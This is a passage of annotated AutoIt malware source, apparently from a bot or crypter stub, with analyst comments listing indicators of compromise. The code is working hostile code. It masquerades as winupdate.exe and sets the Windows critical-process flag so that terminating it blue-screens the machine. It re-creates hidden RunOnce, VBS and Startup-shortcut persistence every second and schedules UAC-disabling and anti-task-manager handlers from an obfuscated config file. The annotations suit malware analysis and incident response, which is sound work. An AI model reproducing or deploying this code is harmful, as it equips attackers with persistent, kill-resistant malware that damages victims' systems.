- Return $acall[4]   ; the handle* out value
- EndFunc
- ; _security__openthreadtokenex: like _security__openthreadtoken, but when the
- ; thread has no token yet (ERROR_NO_TOKEN) it calls ImpersonateSelf and retries.
- ; Returns the token handle, or 0 with @error (1 impersonate, 2 retry, 3 other)
- ; and @extended = GetLastError.
- Func _security__openthreadtokenex($iaccess, $hthread = 0, $fopenasself = False)
- Local $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
- If $htoken = 0 Then
- If _winapi_getlasterror() <> $error_no_token Then Return SetError(3, _winapi_getlasterror(), 0)
- If NOT _security__impersonateself() Then Return SetError(1, _winapi_getlasterror(), 0)
- $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
- If $htoken = 0 Then Return SetError(2, _winapi_getlasterror(), 0)
- EndIf
- Return $htoken
- EndFunc
- ; _security__setprivilege: enable ($fenable=True) or disable a named privilege
- ; on $htoken. Two AdjustTokenPrivileges calls: the first, with Attributes=0,
- ; only serves to read the current state into $tprevstate; the second applies
- ; that state with SE_PRIVILEGE_ENABLED set or cleared. Returns True/False
- ; (@error 1 = unknown privilege name, 2/3 = the respective adjust call failed).
- ; Used here to toggle SeDebugPrivilege for opening other processes.
- Func _security__setprivilege($htoken, $sprivilege, $fenable)
- Local $iluid = _security__lookupprivilegevalue("", $sprivilege)
- If $iluid = 0 Then Return SetError(1, @extended, False)
- Local $tcurrstate = DllStructCreate($tagtoken_privileges)
- Local $icurrstate = DllStructGetSize($tcurrstate)
- Local $tprevstate = DllStructCreate($tagtoken_privileges)
- Local $iprevstate = DllStructGetSize($tprevstate)
- Local $trequired = DllStructCreate("int Data")
- DllStructSetData($tcurrstate, "Count", 1)
- DllStructSetData($tcurrstate, "LUID", $iluid)
- If NOT _security__adjusttokenprivileges($htoken, False, $tcurrstate, $icurrstate, $tprevstate, $trequired) Then Return SetError(2, @error, False)   ; Attributes left 0: query step
- DllStructSetData($tprevstate, "Count", 1)
- DllStructSetData($tprevstate, "LUID", $iluid)
- Local $iattributes = DllStructGetData($tprevstate, "Attributes")
- If $fenable Then
- $iattributes = BitOR($iattributes, $se_privilege_enabled)
- Else
- $iattributes = BitAND($iattributes, BitNOT($se_privilege_enabled))
- EndIf
- DllStructSetData($tprevstate, "Attributes", $iattributes)
- If NOT _security__adjusttokenprivileges($htoken, False, $tprevstate, $iprevstate, $tcurrstate, $trequired) Then Return SetError(3, @error, False)   ; apply step
- Return True
- EndFunc
- ; _security__sidtostringsid: ConvertSidToStringSidW wrapper. Copies the
- ; returned string out of the LocalAlloc buffer and frees it. Returns "" with
- ; @error=1 (invalid SID) or 2 (call failed).
- Func _security__sidtostringsid($psid)
- If NOT _security__isvalidsid($psid) Then Return SetError(1, 0, "")
- Local $acall = DllCall("advapi32.dll", "bool", "ConvertSidToStringSidW", "struct*", $psid, "ptr*", 0)
- If @error OR NOT $acall[0] Then Return SetError(2, @extended, "")
- Local $pstringsid = $acall[2]
- Local $ssid = DllStructGetData(DllStructCreate("wchar Text[" & _winapi_stringlenw($pstringsid) + 1 & "]", $pstringsid), "Text")
- _winapi_localfree($pstringsid)   ; buffer is owned by the API caller
- Return $ssid
- EndFunc
- ; _security__stringsidtosid: ConvertStringSidToSidW wrapper. Returns a
- ; DllStruct holding a private copy of the binary SID (the API's LocalAlloc
- ; buffer is freed), or 0 with @error=1.
- Func _security__stringsidtosid($ssid)
- Local $acall = DllCall("advapi32.dll", "bool", "ConvertStringSidToSidW", "wstr", $ssid, "ptr*", 0)
- If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
- Local $psid = $acall[2]
- Local $tbuffer = DllStructCreate("byte Data[" & _security__getlengthsid($psid) & "]", $psid)
- Local $tsid = DllStructCreate("byte Data[" & DllStructGetSize($tbuffer) & "]")
- DllStructSetData($tsid, "Data", DllStructGetData($tbuffer, "Data"))
- _winapi_localfree($psid)
- Return $tsid
- EndFunc
- ; _winapi_closehandle: CloseHandle wrapper. Returns the API's BOOL.
- Func _winapi_closehandle($hobject)
- Local $aresult = DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hobject)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- ; _winapi_createsolidbrush: CreateSolidBrush wrapper (GDI). Not referenced by
- ; any code visible in this listing.
- Func _winapi_createsolidbrush($ncolor)
- Local $aresult = DllCall("gdi32.dll", "handle", "CreateSolidBrush", "dword", $ncolor)
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- ; _winapi_deletedc: DeleteDC wrapper (GDI).
- Func _winapi_deletedc($hdc)
- Local $aresult = DllCall("gdi32.dll", "bool", "DeleteDC", "handle", $hdc)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- ; _winapi_deleteobject: DeleteObject wrapper (GDI).
- Func _winapi_deleteobject($hobject)
- Local $aresult = DllCall("gdi32.dll", "bool", "DeleteObject", "handle", $hobject)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- ; _winapi_fillrect: FillRect wrapper. $hbrush may be a brush handle or a
- ; system-colour index (COLOR_xxx + 1), hence the two call signatures.
- Func _winapi_fillrect($hdc, $ptrrect, $hbrush)
- Local $aresult
- If IsPtr($hbrush) Then
- $aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "handle", $hbrush)
- Else
- $aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "dword_ptr", $hbrush)
- EndIf
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- ; _winapi_getclassname: GetClassNameW wrapper; accepts a HWND or an AutoIt
- ; control ID. Returns the class name, with @extended = its length.
- Func _winapi_getclassname($hwnd)
- If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd)
- Local $aresult = DllCall("user32.dll", "int", "GetClassNameW", "hwnd", $hwnd, "wstr", "", "int", 4096)
- If @error Then Return SetError(@error, @extended, False)
- Return SetExtended($aresult[0], $aresult[2])
- EndFunc
- ; _winapi_getclientrect: GetClientRect wrapper. Returns a $tagrect struct.
- Func _winapi_getclientrect($hwnd)
- Local $trect = DllStructCreate($tagrect)
- DllCall("user32.dll", "bool", "GetClientRect", "hwnd", $hwnd, "struct*", $trect)
- If @error Then Return SetError(@error, @extended, 0)
- Return $trect
- EndFunc
- ; _winapi_getcurrentthread: GetCurrentThread wrapper (pseudo-handle).
- Func _winapi_getcurrentthread()
- Local $aresult = DllCall("kernel32.dll", "handle", "GetCurrentThread")
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- ; _winapi_getdc: GetDC wrapper.
- Func _winapi_getdc($hwnd)
- Local $aresult = DllCall("user32.dll", "handle", "GetDC", "hwnd", $hwnd)
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- ; _winapi_getdesktopwindow: GetDesktopWindow wrapper.
- Func _winapi_getdesktopwindow()
- Local $aresult = DllCall("user32.dll", "hwnd", "GetDesktopWindow")
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- ; _winapi_getmodulehandle: GetModuleHandleW wrapper. An empty name is passed
- ; as a NULL pointer, which makes the API return the calling executable's base.
- Func _winapi_getmodulehandle($smodulename)
- Local $smodulenametype = "wstr"
- If $smodulename = "" Then
- $smodulename = 0
- $smodulenametype = "ptr"
- EndIf
- Local $aresult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", $smodulenametype, $smodulename)
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- ; _winapi_getwindow: GetWindow wrapper ($icmd = GW_* relationship code).
- Func _winapi_getwindow($hwnd, $icmd)
- Local $aresult = DllCall("user32.dll", "hwnd", "GetWindow", "hwnd", $hwnd, "uint", $icmd)
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- ; _winapi_iswindowvisible: IsWindowVisible wrapper.
- Func _winapi_iswindowvisible($hwnd)
- Local $aresult = DllCall("user32.dll", "bool", "IsWindowVisible", "hwnd", $hwnd)
- If @error Then Return SetError(@error, @extended, 0)
- Return $aresult[0]
- EndFunc
- ; _winapi_lineto: LineTo wrapper (GDI).
- Func _winapi_lineto($hdc, $ix, $iy)
- Local $aresult = DllCall("gdi32.dll", "bool", "LineTo", "handle", $hdc, "int", $ix, "int", $iy)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- ; _winapi_localfree: LocalFree wrapper; used to release buffers returned by
- ; the ConvertSid* APIs above.
- Func _winapi_localfree($hmem)
- Local $aresult = DllCall("kernel32.dll", "handle", "LocalFree", "handle", $hmem)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- ; _winapi_moveto: MoveToEx wrapper (GDI); previous position is discarded.
- Func _winapi_moveto($hdc, $ix, $iy)
- Local $aresult = DllCall("gdi32.dll", "bool", "MoveToEx", "handle", $hdc, "int", $ix, "int", $iy, "ptr", 0)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- ; _winapi_openprocess: OpenProcess wrapper. If the first attempt fails and
- ; $fdebugpriv is True, it enables SeDebugPrivilege on the calling thread's
- ; token, retries once, then disables the privilege again.
- ; Returns the process handle or 0; @error/@extended reflect the last failure.
- ; In this file __bsod calls it with $fdebugpriv left False and instead relies
- ; on __debuge_privilege having enabled SeDebugPrivilege beforehand.
- Func _winapi_openprocess($iaccess, $finherit, $iprocessid, $fdebugpriv = False)
- Local $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
- If @error Then Return SetError(@error, @extended, 0)
- If $aresult[0] Then Return $aresult[0]
- If NOT $fdebugpriv Then Return 0
- Local $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
- If @error Then Return SetError(@error, @extended, 0)
- _security__setprivilege($htoken, "SeDebugPrivilege", True)
- Local $ierror = @error
- Local $ilasterror = @extended
- Local $iret = 0
- If NOT @error Then
- $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)   ; retry with the privilege
- $ierror = @error
- $ilasterror = @extended
- If $aresult[0] Then $iret = $aresult[0]
- _security__setprivilege($htoken, "SeDebugPrivilege", False)   ; drop it again
- If @error Then
- $ierror = @error
- $ilasterror = @extended
- EndIf
- EndIf
- _winapi_closehandle($htoken)
- Return SetError($ierror, $ilasterror, $iret)
- EndFunc
- ; __winapi_parsefiledialogpath: split $spath at its last separator into
- ; [2, directory, file name]. NOTE: AutoIt has no backslash escapes, so the
- ; literal `\\` here is a two-character separator - the stock UDF splits on a
- ; single "\"; the doubling is presumably an artefact of this paste.
- ; Not referenced by any code visible in this listing.
- Func __winapi_parsefiledialogpath($spath)
- Local $afiles[3]
- $afiles[0] = 2
- Local $stemp = StringMid($spath, 1, StringInStr($spath, "\\", 0, -1) - 1)
- $afiles[1] = $stemp
- $afiles[2] = StringMid($spath, StringInStr($spath, "\\", 0, -1) + 1)
- Return $afiles
- EndFunc
- ; _winapi_releasedc: ReleaseDC wrapper.
- Func _winapi_releasedc($hwnd, $hdc)
- Local $aresult = DllCall("user32.dll", "int", "ReleaseDC", "hwnd", $hwnd, "handle", $hdc)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- ; _winapi_screentoclient: ScreenToClient wrapper; $tpoint is updated in place.
- Func _winapi_screentoclient($hwnd, ByRef $tpoint)
- Local $aresult = DllCall("user32.dll", "bool", "ScreenToClient", "hwnd", $hwnd, "struct*", $tpoint)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- ; _winapi_selectobject: SelectObject wrapper (GDI); returns the previous object.
- Func _winapi_selectobject($hdc, $hgdiobj)
- Local $aresult = DllCall("gdi32.dll", "handle", "SelectObject", "handle", $hdc, "handle", $hgdiobj)
- If @error Then Return SetError(@error, @extended, False)
- Return $aresult[0]
- EndFunc
- ; _winapi_stringlenw: lstrlenW on a raw wide-string pointer; used to size the
- ; copy in _security__sidtostringsid.
- Func _winapi_stringlenw($vstring)
- Local $acall = DllCall("kernel32.dll", "int", "lstrlenW", "struct*", $vstring)
- If @error Then Return SetError(1, @extended, 0)
- Return $acall[0]
- EndFunc
- ;-------------------------------------------------------------------------------------------------------------------------------------------------
- ; Hard-coded image name the "protect process" logic acts on. Presumably the
- ; name the running copy was dropped under; it masquerades as a Windows Update
- ; binary. IOC: a process named winupdate.exe outside the Windows directory.
- $scriptname = "winupdate.exe"
- ; anti_hook: Adlib callback (every 500 ms when the option is enabled) that
- ; re-marks the $scriptname process as a critical process, so killing it from
- ; Task Manager / an AV bugchecks the machine. See __bsod.
- Func anti_hook()
- __bsod($scriptname, True)
- EndFunc
- ; "protect process" option: read from the INI-style config file
- ; 65901.PPZ next to the script; the section/key/value names are numeric
- ; (obfuscated). When it matches, anti_hook is scheduled every 500 ms.
- $protectprocess = IniRead($uniscriptdir & "\65901.PPZ", "2244034", "6224525", "NotFound")
- If $protectprocess = "3244993" Then
- AdlibRegister("anti_hook", 500)
- Else
- EndIf
- ; __bsod: set or clear the "critical process" flag on the first process named
- ; $process_name, via NtSetInformationProcess(ProcessBreakOnTermination).
- ;   $bsod_status True  -> terminating that process bugchecks Windows
- ;                         (CRITICAL_PROCESS_DIED)
- ;   $bsod_status False -> clears the flag again (see exitme and loop)
- ; Requires SeDebugPrivilege, hence the __debuge_privilege(True) call first.
- ; Returns a human-readable status string; every caller in this file ignores it.
- ; NOTE(IR): before terminating a process protected this way, clear the flag
- ; with the same call and FALSE (or suspend it instead) - otherwise the host
- ; blue-screens.
- Func __bsod($process_name, $bsod_status)
- Local Const $status_success = 0   ; STATUS_SUCCESS
- Local Const $bsod_class = 29   ; PROCESSINFOCLASS ProcessBreakOnTermination
- Local Const $info_length = 4   ; sizeof(ULONG) flag
- Local Const $process_all_access = 2035711   ; 0x1F0FFF, PROCESS_ALL_ACCESS (pre-Vista mask)
- Local $result, $process_handle, $process_id, $bsod_struct, $bsod_struct_ptr
- If NOT Call("__DEBUGE_PRIVILEGE", True) Then Return "![>] ERROR : DEBUGE PRIVILEGE OF PROCESS [ " & $process_name & " ] CAN NOT CHANGED"   ; AutoIt names are case-insensitive: __debuge_privilege below
- $process_id = ProcessExists($process_name)   ; first PID with that image name
- If $process_id = 0 Then Return "![>] ERROR : PROCESS [ " & $process_name & " ] NOT EXIST"
- $process_handle = _winapi_openprocess($process_all_access, True, $process_id)   ; $fdebugpriv left False; relies on the privilege enabled above
- If @error Then Return "![>] ERROR : CAN NOT OPEN [ " & $process_name & " ] PROCESS"
- $bsod_struct = DllStructCreate("BOOL BSOD_STATUS")
- DllStructSetData($bsod_struct, "BSOD_STATUS", $bsod_status)
- $bsod_struct_ptr = DllStructGetPtr($bsod_struct)
- $result = DllCall("NTDLL.DLL", "DWORD", "NtSetInformationProcess", "HANDLE", $process_handle, "INT", $bsod_class, "PTR", $bsod_struct_ptr, "ULONG", $info_length)
- _winapi_closehandle($process_handle)
- $bsod_struct_ptr = 0
- If $result[0] = $status_success Then
- Return "+[>] BSOD OF PROCESS [ " & $process_name & " ] CHANGED WITH NO ERROR" & @CRLF
- Else
- Return "![>] ERROR : BSOD OF PROCESS [ " & $process_name & " ] NOT CHANGED , ERROR CODE : " & Hex($result[0], 8)   ; NTSTATUS
- EndIf
- EndFunc
- ; __debuge_privilege: enable ($status=True) or disable SeDebugPrivilege on the
- ; calling thread's (impersonation) token. Returns _security__setprivilege's
- ; True/False, or 0 with @error if the token could not be opened.
- ; Requires the running account to hold the privilege (the script is declared
- ; #RequireAdmin elsewhere in the file).
- Func __debuge_privilege($status)
- Local $htoken, $ilasterror
- $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
- If @error Then Return SetError(@error, @extended, 0)
- $ilasterror = _security__setprivilege($htoken, "SEDEBUGPRIVILEGE", $status)
- _winapi_closehandle($htoken)
- Return $ilasterror
- EndFunc
- ; On interpreter exit, clear the critical-process flag again so a normal exit
- ; of the protected process does not take the machine down with it.
- OnAutoItExitRegister("exitme")
- ; exitme: exit handler; removes the critical-process flag from $scriptname.
- Func exitme()
- __bsod($scriptname, False)
- EndFunc
- ;anti botkiller
- ; Option read from the same 65901.PPZ config; when enabled, the antibotkill
- ; persistence re-install runs every second.
- Local $antibotkill = IniRead($uniscriptdir & "\65901.PPZ", "antibotkill-1", "antibotkill-2", "NotFound")
- If $antibotkill = "antibotkill-3" Then
- AdlibRegister("antibotkill", 1000)
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ; antibotkill: Adlib callback (every 1 s) that re-creates three persistence
- ; artefacts whenever one is missing:
- ;   1. HKCU\...\CurrentVersion\RunOnce\<$path>  -> %USERPROFILE%\<$path>\start.vbs
- ;      (64-bit registry view; RunOnce entries are consumed after use, which is
- ;      presumably why the value is re-checked every second)
- ;   2. %USERPROFILE%\<$path>\start.vbs - WScript.Shell launcher that runs
- ;      start.cmd from the same directory with a hidden window
- ;   3. %USERPROFILE%\Startup\start.lnk -> start.vbs, attributes +S +H
- ; IOCs: the RunOnce value, start.vbs/start.cmd under the profile dir, and a
- ; hidden+system start.lnk in the Startup folder. The literal `\\` separators
- ; are two characters in AutoIt (no escaping); presumably a paste artefact.
- Func antibotkill()
- $getstart = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path)
- if $getstart = $unicode_userprofile & "\\" & $path & "\start.vbs" Then
- ;do nothing
- Else
- RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\\" & $path & "\start.vbs")
- EndIf
- if FileExists($unicode_userprofile & "\\" & $path & "\start.vbs") Then
- ;do nothing
- Else
- Local $vbs = FileOpen($unicode_userprofile & "\\" & $path & "\start.vbs", 1)   ; mode 1 = append
- FileWrite($vbs, 'const Hidden = 0' & @CRLF & 'const WaitOnReturn = true' & @CRLF & 'File ="""' & $unicode_userprofile & "\\" & $path & "\\" & 'start.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & 'WshShell.Run file, Hidden, WaitOnReturn' & @CRLF & 'wscript.quit')
- FileClose($vbs)
- EndIf
- if FileExists($unicode_startup & "\start.lnk") Then
- ;do nothing
- Else
- FileCreateShortcut($unicode_userprofile & "\\" & $path & "\start.vbs", $unicode_startup & "\start.lnk")
- FileSetAttrib($unicode_startup & "\start.lnk","+SH")   ; hide the shortcut (system + hidden)
- EndIf
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ; Remaining config options. Each reads an obfuscated key from 65901.PPZ and,
- ; when it matches, schedules a handler as an Adlib timer. The handlers
- ; persistence, systemhide, antitask and disable_uac are defined elsewhere in
- ; the file (not in this excerpt).
- ;persistence
- Local $persistence = IniRead($uniscriptdir & "\65901.PPZ", "3206254", "5598349", "NotFound")
- If $persistence = "4588436" Then
- AdlibRegister("persistence", 500)
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;system hide
- Local $systemhide = IniRead($uniscriptdir & "\65901.PPZ", "systemhide1", "systemhide2", "NotFound")
- If $systemhide = "systemhide3" Then
- AdlibRegister("systemhide",500)
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;antitask
- Local $antitask = IniRead($uniscriptdir & "\65901.PPZ", "antitask1", "antitask2", "NotFound")
- If $antitask = "antitask3" Then
- AdlibRegister("antitask",500)
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;disable uac
- Local $uac = IniRead($uniscriptdir & "\65901.PPZ", "6404000", "6662859", "NotFound")
- If $uac = "9455413" Then
- AdlibRegister("disable_uac",500)
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ; Keep the interpreter alive so the Adlib timers keep firing: the first
- ; enabled option below enters loop(), which never returns, so the checks
- ; after it are never evaluated. If none matches, the script simply ends.
- ; Note the antitask check compares against "antitask", not the "antitask3"
- ; enable value used above, so that option on its own does not enter loop().
- If $uac = "9455413" Then
- loop()
- EndIf
- If $systemhide = "systemhide3" Then
- loop()
- EndIf
- If $antitask = "antitask" Then
- loop()
- EndIf
- If $antibotkill = "antibotkill-3" Then
- loop()
- EndIf
- If $mutex = "mutex3" Then
- loop()
- EndIf
- If $protectprocess = "3244993" Then
- loop()
- EndIf
- If $persistence = "4588436" Then
- loop()
- EndIf
- ; loop: never-returning main wait loop (100 ms ticks; Adlib handlers
- ; presumably keep firing during Sleep). Two triggers:
- ;   - kill switch: if %USERPROFILE%\datascrambler\clean.txt exists, the
- ;     critical-process flag on $scriptname is cleared (presumably so a
- ;     cleanup tool can then terminate it without a bugcheck)
- ;   - a window whose title matches $path triggers bsod(), defined elsewhere
- ;     in the file
- ; IR tip: creating the clean.txt marker is the cheapest way to disarm the
- ; critical-process protection before killing the process.
- func loop()
- while 1
- If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
- __bsod($scriptname, False)
- EndIf
- If WinExists($path) Then
- bsod()
- Else
- EndIf
- sleep(100)
- WEnd
- EndFunc